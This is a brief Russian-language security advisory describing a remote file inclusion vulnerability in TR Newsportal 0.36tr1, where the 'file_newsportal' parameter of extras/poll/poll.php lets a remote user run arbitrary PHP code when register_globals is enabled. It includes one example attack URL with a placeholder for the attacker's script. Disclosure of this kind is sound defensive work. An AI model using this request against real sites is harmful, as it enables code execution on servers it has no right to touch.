Программа: TR Newsportal 0.36tr1, возможно другие версии.

Уязвимость позволяет удаленному пользователю выполнить произвольный код на
целевой системе. Уязвимость существует из-за недостаточной обработки входных
данных в параметре "file_newsportal" в сценарии extras/poll/poll.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для
удачной эксплуатации уязвимости опция "register_globals" должна быть включена.

Пример:

http://www.site.com/[Newsportal_path]/extras/ poll/poll.php?file_newsportal=[evil_scripts]

 



Оставить мнение